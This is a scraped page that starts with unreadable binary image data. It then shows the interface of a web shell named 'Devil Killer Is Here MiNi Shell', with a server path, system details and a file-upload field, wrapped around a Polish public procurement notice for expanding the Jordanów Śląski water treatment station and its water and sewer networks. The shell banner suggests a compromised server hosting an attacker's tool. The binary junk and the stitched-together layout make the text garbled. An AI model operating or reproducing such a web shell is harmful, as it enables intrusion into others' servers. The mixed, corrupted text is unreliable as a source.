JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241211/0064779401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zaprojektowanie i rozbudowa SUW Jordanów Śląski wraz z magistralą wodociągową zasilającą zbiorniki wyrównawcze wieżowe podziemne, <br/>rozbudowa sieci wodociągowej oraz wykonanie kanalizacji sanitarnej . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jordanów Śląski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935030</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 55</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jordanów Śląski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-065</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 3911580</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">71 3911590</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@jordanowslaski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jordanowslaski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie i rozbudowa SUW Jordanów Śląski wraz z magistralą wodociągową zasilającą zbiorniki wyrównawcze wieżowe podziemne, <br/>rozbudowa sieci wodociągowej oraz wykonanie kanalizacji sanitarnej . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bbbc919b-a729-4d5e-b0e7-7b276a5d0287</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00647794</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00037404/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Zaprojektowanie i rozbudowa SUW Jordanów Śląski wraz z magistralą wodociągową zasilającą zbiorniki wyrównawcze wieżowe podziemne, rozbudowa sieci wodociągowej oraz wykonanie kanalizacji sanitarnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejski Funduszu Rolny na rzecz Rozwoju Obszarów Wiejskich (EFRROW) w ramach PROW na lata 2014 – 2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bbbc919b-a729-4d5e-b0e7-7b276a5d0287 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl https://www.bip.jordanowslaski.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformy e-Zamówienia pod adresem https://ezamowienia.gov.pl.<br/>Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem https://ezamowienia.gov.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na<br/>platformie e-zamówienia. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości do niego<br/>przesłanych.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane<br/>zostały w Regulaminie korzystania z Platformy e-Zamówienia dostępnym pod adresem https://ezamowienia.gov.pl oraz informacje<br/>zamieszczone w zakładce „Centrum Pomocy”. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. Za datę przekazania oferty, oświadczenia, o którym<br/>mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji,<br/>oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformie e-zamówienia.<br/>8. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza dostępnego na platformie e-zamówienia (Formularz do komunikacji). Korespondencja przesłana za<br/>pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem<br/>niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego<br/>1. Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa<br/>Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach oraz rozporządzenie RODO.<br/>2. Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu:<br/>a) przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b) zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>c) dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>d) przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e) udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f) archiwizacji postępowania.<br/>3. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>4. Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z<br/>przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>5. Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO:<br/>a) prawo dostępu do danych (art. 15),<br/>b) prawo sprostowania danych (art. 16),<br/>c) prawo do usunięcia danych (art. 17),<br/>d) prawo do ograniczenia przetwarzania danych (art. 18).<br/>e) prawo wniesienia skargi do organu nadzorczego.<br/>6. Osobie, której dane dotyczą nie przysługuje:<br/>a) prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia<br/>RODO,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c) prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO.<br/>7. Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania<br/>warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może<br/>wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>8. Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/>9. Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in. z<br/>art 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.<br/>10. Dane osobowe pozyskane w postępowaniu nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>11. Dane osobowe pozyskane w postępowaniu nie będą przekazywane do Państw trzecich oraz instytucji międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej i wykonanie robót budowlano-montażowych w ramach<br/>zadania inwestycyjnego pn. „Zaprojektowanie i rozbudowa Stacji Uzdatniania Wody „Jordanów Śląski” wraz z magistralą<br/>wodociągową zasilającą zbiorniki wyrównawcze wieżowe podziemne, rozbudowa sieci wodociągowej oraz wykonanie<br/>kanalizacji sanitarnej od ul. Jesionowej do ul. Wrocławskiej&#34; realizowanego w formule „zaprojektuj i wybuduj” wraz z<br/>uzyskaniem pozwolenia na użytkowanie.<br/>- Wykonanie dokumentacji projektowej w tym:<br/>• obsługa geodezyjna,<br/>• projekt prac geologicznych na wykonanie studni Nr 1b i likwidację studni nr 1a,<br/>• powykonawcza zasobowa dokumentacja hydrogeologiczna studni Nr 1b,<br/>• decyzja środowiskowa i pozwolenia wodno-prawne,<br/>• projekty zagospodarowania (3 egz.) i uzyskanie pozwolenia na budowę,<br/>• projekty techniczne w rozbiciu na poszczególne branże (3 egz.)<br/>• inne projekty, które wynikają z przepisów prawa niezbędne do prawidłowego wykonania zadania,<br/>• specyfikacja techniczna wykonania i odbioru robót budowlanych (2 egz.),<br/>• harmonogram rzeczowo-finansowy.<br/>- Wykonanie robót budowlanych zgodnie z zaakceptowaną przez Zamawiającego<br/>dokumentacją projektową.<br/>- Wykonanie rozruchu z osiągnięciem wymaganych przez zamawiającego parametrów<br/>wody pitnej,<br/>- Przygotowanie dokumentacji do uzyskania pozwolenia na użytkowanie,<br/>- Przeprowadzenie szkolenia obsługi SUW,<br/>- Dostarczenie kompletu sprzętu, oznakowań, instrukcji, środków ochrony zbiorowej<br/>z zakresu bhp i ochrony przeciwpożarowej, wymaganych przepisami szczegółowymi dla prawidłowej eksploatacji SUW,<br/>- Wykonanie instrukcji eksploatacji zbiorników wyrównawczych oraz instrukcji obsługi,<br/>obiektów i konserwacji urządzeń niezbędnych dla prawidłowej eksploatacji SUW,<br/>- Wykonanie dokumentacji powykonawczej - 2 egz.<br/>- Wykonanie tablic informacyjnych i pamiątkowych,<br/>- Wykonanie oznakowania obiektów i instalacji,<br/>Ogólna koncepcja rozbudowy SUW i wodociągu grupowego &#34;Jordanów&#34; zakłada wykonanie następujących robót budowlanych:<br/>- Stacja Uzdatniania Wody:<br/>• badania hydrogeologiczne i wykonanie nowej studni nr 1b wraz z obudową z laminatu, uzbrojeniem i włączeniem do ist.<br/>Układu- wykonanie rur połączeniowych z istniejącym układem<br/>• remont istniejącego zbiornika retencyjnego żelbetowego o pojemności V- 80m3 , ściany grubości 30 cm, spękane.<br/>Średnica zbiornika zew. 7,97m Rzędna zw. wody 154,71m n. p.m., na tym poziomie zamontować nowy zawór pływakowy do<br/>zamykania max. napełnienia zbiornika. W zbiorniku wymienić wszystkie rury, na rury ze stali nierdzewnej. Zbiornik ocieplić-<br/>Remont komory zasuw przy zbiorniku –komora spękana<br/>• dostawienie do istniejącego zestawu pomp sieciowych 3*KSB jednej pompy KSB VF 32-3 Qn-27 m3/h; H-45.9; p-5,5 KW z<br/>falownikiem<br/>• wymiana istniejącego zestawu do chlorowania na nowy zestaw pompa-zbiornik z wydajnością dostosowaną do wydajności<br/>SUW oraz montaż w budynku SUW rejestratora ilości chloru w wodzie uzdatnionej podawanej na sieć wodociągu<br/>„Jordanów”<br/>• wykonanie jednego nowego zbiornika wyrównawczego konstrukcji stalowej ocieplonego o pojemności 1x 100m3 na<br/>fundamencie żelbetowym - poziom zw. wody dostosowany do istniejącego zbiornika V-100m3, tj. 158,79 m n.p.m.<br/>• wykonanie nowego zbiornika wyrównawczego żelbetowego podziemnego obsypanego V-560m3 konstrukcji żelbetowej<br/>dostawionego do istniejących zbiorników wraz z komorą zasuw. Zwierciadło wody o rzędnej 183,15 m n.p.m. ( identyczna<br/>rzędna jak dwóch istniejących zbiorników żelbetowych), wraz z przepięciem na działce 761/15.<br/>• wykonanie nowego zestawu pompowego przy istniejących zbiornikach retencyjnych wieżowych na dz. nr. 761/15 dla<br/>podania wody do Jordanowa i sąsiednich miejscowości- Dankowice<br/>• wymiana rur żeliwnych w komorze rozdzielczej zasuw przy istniejących zbiornikach wieżowych na rury i kształtki PE wraz<br/>montażem nowego wodomierza fi 150 mm<br/>• demontaż istniejącej studni nr. 1a<br/>• wykonanie sieci i instalacji elektrycznych i wpięcie ich do istniejących sieci na stacji uzdatniania wody i przy zbiornikach<br/>wieżowych,<br/>• wykonanie sterowania zbiornikami wieżowymi i nowym zbiornikiem- radiowo z układem w sterowniczym w SUW<br/>• wykonanie nowego zagospodarowania terenu -zbiorniki retencyjne, nowy odwiert studni<br/>• zabudowa i podłączenie stacjonarnego agregatu prądotwórczego-wyciszonego<br/>60 kVA.<br/>Zakłada się, że rozbudowa Stacji Uzdatniania Wody nie będzie wychodziła poza wygrodzony teren oraz część<br/>technologiczna zostanie zrealizowana w istniejącym budynku bez konieczności jego rozbudowy( dostawienie jednej pompy,<br/>nowy zestaw chloratora ze zbiornikiem i automatycznym odczytem ilości chloru.<br/>Wykonawca ma za zadanie zaprojektować i wykonać układ zasilania w wodę surową i magazynowania uzdatnionej wody<br/>podziemnej i uzyskać produkcję wody w ilości Qmaxd = 1450 m3/d spełniającej wymagania określone w Rozporządzeniu<br/>Ministra Zdrowia z dnia 07 grudnia 2017 r. (Dz. U.2017, Poz. 2294)<br/>- Budowa magistrali wodociągowej:<br/>• rurociąg tranzytowy 􀀀225 PE100 RC SDR17 dł. 1 290 mb od SUW Jordanów do istniejących zbiorników wieżowych 2x V-<br/>150m3 i nowo realizowanego zbiornika, zabudowany wodociąg metodą horyzontalnego przewiertu sterowanego.<br/>Magistralę wodociągową prowadzić w pasie drogowym dróg gminnych- terenem prywatnym pod rzeką Oleszna i rzeką<br/>Ślęza min. 1,5 m pod dnem.<br/>Magistralę włączyć do istniejącego rurociągu tłocznego na terenie SUW &#34;Jordanów&#34; oraz na terenie działki nr. 761/15 do<br/>istniejącej przeprojektowanej technologicznie komory zasuw przy dwóch zbiornikach i doprojektowanej komory zasuw<br/>nowego zbiornika V-560 m3 .<br/>- Rozbudowa sieci wodociągowej rozdzielczej:<br/>• rurociągi rozdzielcze 􀀀160PE100RC SDR17 dł. 398 m w kierunku nowych Osiedli mieszkaniowych<br/>• rurociągi rozdzielcze 􀀀125PE100RC SDR17 dł. 1615 mb w kierunku nowych Osiedli mieszkaniowych<br/>• przełożenie rurociągu PVC 􀀀160mm na wodociąg z rur PE100 􀀀160mm w ul. Perłowej w pobliżu ul. Szkolnej o długości<br/>57,0m wraz z węzłami zasuw<br/>• wykonanie nowego odcinka PE 􀀀160 mm o dł. 1715 m spinającego istniejący rurociąg PVC 􀀀160 w kierunku Tomic z<br/>istniejącym wodociągiem PVC 􀀀110 mm w kierunku wsi Wiczkowice w miejscowości Jordanów Śląski działka nr. 257/1- ul.<br/>Jesionowa z węzłami zasuw<br/>• wykonanie zestawu hydroforowego do podnoszenia ciśnienia i zwiększonej wydajności dla projektowanych wodociągów i<br/>istniejącego wodociągu zasilające wsie Popowice i Biskupice (brak zabezpieczenia p,poż) przy skrzyżowaniu ulic Szkolnej i<br/>Perłowej w zbiorniku podziemnym. Włączenie zestawu hydroforowego do istniejącego wodociągu 􀀀160 PVC<br/>• wykonanie zestawu hydroforowego do podnoszenia ciśnienia i zwiększonej wydajności dla projektowanych wodociągu<br/>spinającego PE 􀀀160 w ul. Jesionowej i istniejącego wodociągu PVC􀀀110 zasilające wieś Wilczkowice w poboczu ul.<br/>Wrocławskiej na działce nr. 157/2-ul. Wrocławska na wysokości nr. 80 w Jordanowie Śląskim w zbiorniku podziemnym.<br/>Włączenie zestawu hydroforowego do istniejącego wodociągu fi110 PVC . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Postanowienia dot. kryterium cena: Punkty w tym kryterium zostaną przyznane według wzoru: C = (Cmin/C o) x 60 pkt<br/>gdzie: C min- najniższa cena brutto z ocenianych ofert (zł)<br/>C o - cena brutto określona w ocenianej ofercie (zł)<br/>Postanowienia dot. kryterium gwarancja: Liczba punktów w kryterium gwarancja jakości zostanie przyznany w oparciu o<br/>zadeklarowany przez Wykonawcę okres gwarancji. Wykonawca może zadeklarować okres gwarancji w następującym przedziale 36-<br/>60 miesięcy.<br/>Wykonawca udzieli minimum 36 miesięcy gwarancji, maksymalnie 60 miesięcy gwarancji licząc od daty dokonania odbioru<br/>końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 72 miesięcy,<br/>Zamawiający do oceny ofert przyjmie okres 72 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty<br/>okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny<br/>minimalny (wymagany) 36 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w<br/>umowie.<br/>W kryterium gwarancja ocenie poddany zostanie okres gwarancji na roboty budowlane zaoferowane przez Wykonawcę na<br/>formularzu ofertowym a Zamawiający przyzna punkty w następujący sposób:<br/>Wykonawca, który zaoferuje termin gwarancji w wysokości co najmniej 36 miesięcy otrzyma 0 pkt.<br/>Wykonawca, który zaoferuje termin gwarancji w wysokości co najmniej 48 miesięcy otrzyma 20 pkt.<br/>Wykonawca, który zaoferuje termin gwarancji w wysokości co najmniej 60 miesięcy otrzyma 40 pkt.<br/>Łączną liczba punktów zostanie obliczona według następującego wzoru:<br/>P = C + G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span 